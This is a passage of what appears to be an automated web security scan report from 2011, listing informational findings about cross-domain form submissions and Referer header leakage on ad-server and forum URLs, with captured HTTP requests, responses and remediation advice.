<title>OnWav</title>
<meta http-equiv="Content-Type" content="tex
...[SNIP]...
<div id="payfloat">
<form action='https://paytrace.com/cart/donate.pay' method=post>
<p>
...[SNIP]...

17.3. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

text1
text2
submit

Request

Response

17.4. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

text1
text2
submit

Request

Response

17.5. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

text1
text2
submit

Request

Response

17.6. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

text1
text2
submit

Request

Response

17.7. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

text1
text2
submit

Request

Response

17.8. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

text1
text2
submit

Request

Response

18. Cross-domain Referer leakage previous next
There are 37 instances of this issue:

http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget
http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget
http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget
http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget
http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget
http://fls.doubleclick.net/activityi
http://forum.link2voip.com/viewtopic.php
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js
http://investor.hickorytech.com/phoenix.zhtml
http://news.google.com/news/search
http://www.911enable.com/business/contact_specialist.php
http://www.facebook.com/plugins/like.php
http://www.google.com/search
http://www.google.com/search
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.nationalnanpa.com/nas/public/assigned_code_query_display.do
http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html
http://www.stumbleupon.com/badge/embed/1/
http://www.virtual-phone-number.org/index.php
http://www.vonage.com/lp/US/afflpdc/

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

18.1. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=125x125;tile=2;pos=smsquare1;ord=63786.06336656958

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2577238/CP_MotoWirelessCenter10_125.gif

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=125x125;tile=2;pos=smsquare1;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:47:08 GMT
Content-Length: 357

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/c;222977620;0-0;0;44107191;3-125/125;36626365/36644243/1;;~sscs=%3fhttp://connectedplanetonline.com/wireless-broadband/"><img src="http://s0.2mdn.net/viewad/2577238/CP_MotoWirelessCenter10_125.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.2. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=120x60;tile=5;pos=button1;ord=63786.06336656958

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2577238/CP_WPP120.gif

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=120x60;tile=5;pos=button1;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:47:15 GMT
Content-Length: 334

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/t;221160671;0-0;0;44107191;6-120/60;35086960/35104790/1;;~sscs=%3fhttp://www.connectedplanetonline.com/whitepapers"><img src="http://s0.2mdn.net/viewad/2577238/CP_WPP120.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.3. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=336x280;tile=3;pos=boombox1;ord=63786.06336656958

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2577238/1-CP_ProgressSoftware_Micro_336ver3.gif

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=336x280;tile=3;pos=boombox1;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:47:11 GMT
Content-Length: 375

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/f;222973530;0-0;0;44107191;4252-336/280;37538309/37556187/1;;~sscs=%3fhttp://connectedplanetonline.com/progress-software/?cid=336"><img src="http://s0.2mdn.net/viewad/2577238/1-CP_ProgressSoftware_Micro_336ver3.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.4. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;dcopt=ist;sz=728x90;tile=1;pos=fullbanner1;ord=63786.06336656958

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2577238/MWDublin728X90WEB.gif

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;dcopt=ist;sz=728x90;tile=1;pos=fullbanner1;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:48:04 GMT
Content-Length: 328

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/k;238282886;0-0;0;44107191;3454-728/90;41177685/41195472/1;;~sscs=%3fhttp://www.tmforum.org/mw2011cp"><img src="http://s0.2mdn.net/viewad/2577238/MWDublin728X90WEB.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.5. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=300x125;tile=4;pos=small3001;ord=63786.06336656958

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2577238/CP_JOLT_300.gif

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=300x125;tile=4;pos=small3001;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:47:13 GMT
Content-Length: 334

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/q;221184486;1-0;0;44107191;367-300/125;35182385/35200203/1;;~sscs=%3fhttp://blog.connectedplanetonline.com/jolt/"><img src="http://s0.2mdn.net/viewad/2577238/CP_JOLT_300.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.6. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=2333498;type=vonag670;cat=afill201;ord=8458235408179.462?

The response contains the following links to other domains:

http://edge.quantserve.com/quant.js
http://pixel.quantserve.com/pixel/p-3eN-KnpwQqheA.gif?labels=_fp.event.AFFILIATE-RESIDENTIAL-DC

Request

GET /activityi;src=2333498;type=vonag670;cat=afill201;ord=8458235408179.462? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/lp/US/afflpdc/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Thu, 12 May 2011 00:50:40 GMT
Expires: Thu, 12 May 2011 00:50:40 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 682

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Start Quantcast
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-3eN-KnpwQqheA.gif?labels=_fp.event.AFFILIATE-RESIDENTIAL-DC" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

18.7. http://forum.link2voip.com/viewtopic.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.link2voip.com
Path:	/viewtopic.php

Issue detail

The page was loaded from a URL containing a query string:

http://forum.link2voip.com/viewtopic.php?f=19&t=185

The response contains the following links to other domains:

http://www.phpbb.com/
http://www.phpbbhq.com/

Request

GET /viewtopic.php?f=19&t=185 HTTP/1.1
Host: forum.link2voip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:44:43 GMT
Set-Cookie: phpbb3_82ha5_u=1; expires=Fri, 11-May-2012 00:44:43 GMT; path=/; domain=forum.link2voip.com; HttpOnly
Set-Cookie: phpbb3_82ha5_k=; expires=Fri, 11-May-2012 00:44:43 GMT; path=/; domain=forum.link2voip.com; HttpOnly
Set-Cookie: phpbb3_82ha5_sid=30cf441e48c964d411cc69972e856ae1; expires=Fri, 11-May-2012 00:44:43 GMT; path=/; domain=forum.link2voip.com; HttpOnly
Content-type: text/html; charset=UTF-8
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Length: 36649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<span class="copyright">phpBB skin developed by: <a href="http://www.phpbbhq.com/">phpBB Headquarters</a><br />Powered by <a href="http://www.phpbb.com/">phpBB</a>
...[SNIP]...

18.8. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5216754536572039&output=html&h=90&slotname=2160251714&w=728&lmt=1302640331&color_bg=FFFFFF&color_border=FFFFFF&color_link=0000FF&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156434&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739%2C6042837393&correlator=1305161156578&frm=0&adk=1126279905&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=3&dtd=269&xpc=T6jA0ZNAkz&p=http%3A//www.dslreports.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.dslreports.com/forum/r25728643-Nettalk-number-portability-%26hl%3Den%26client%3Dca-pub-5216754536572039%26adU%3DBestVoIP.Smart-VoIP.com%26adT%3DWhich%2BVoIP%2Bis%2Bthe%2BBest%253F%26adU%3DSmartAsk.com/CellPlanCompare%26adT%3DCell%2BPhone%2BPlans%26adU%3DTech-Support.JustAnswer.com%26adT%3DAsk%2BTech%2BSupport%2BNow%26gl%3DUS&usg=AFQjCNFp5mjttW0Q6PhHxF-BTGCGfjd8Og

Request

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=90&slotname=2160251714&w=728&lmt=1302640331&color_bg=FFFFFF&color_border=FFFFFF&color_link=0000FF&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156434&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739%2C6042837393&correlator=1305161156578&frm=0&adk=1126279905&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=3&dtd=269&xpc=T6jA0ZNAkz&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 00:45:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13874

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.dslreports.com/forum/r25728643-Nettalk-number-portability-%26hl%3Den%26client%3Dca-pub-5216754536572039%26adU%3DBestVoIP.Smart-VoIP.com%26adT%3DWhich%2BVoIP%2Bis%2Bthe%2BBest%253F%26adU%3DSmartAsk.com/CellPlanCompare%26adT%3DCell%2BPhone%2BPlans%26adU%3DTech-Support.JustAnswer.com%26adT%3DAsk%2BTech%2BSupport%2BNow%26gl%3DUS&usg=AFQjCNFp5mjttW0Q6PhHxF-BTGCGfjd8Og" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.9. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.dslreports.com/forum/r25728643-Nettalk-number-portability-%26hl%3Den%26client%3Dca-pub-5216754536572039%26adU%3DVerizon.com/SmallBusiness%26adT%3DVerizon%2BOfficial%2BSite%26adU%3DComputer.JustAnswer.com%26adT%3DAsk%2BTech%2BSupport%2BNow%26adU%3Dwww.NokiaUSA.com/Astound%26adT%3DNokia%2BAstound%2Bon%2BT-Mobile%26adU%3DBlackBerry.com/Pearl%26adT%3DBlackBerry%25C2%25AE%2BPearl%25E2%2584%25A2%2B8220%26gl%3DUS&usg=AFQjCNF-5XU8Fnbt_S9qbaSHOUxsm1BwVg

Request

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
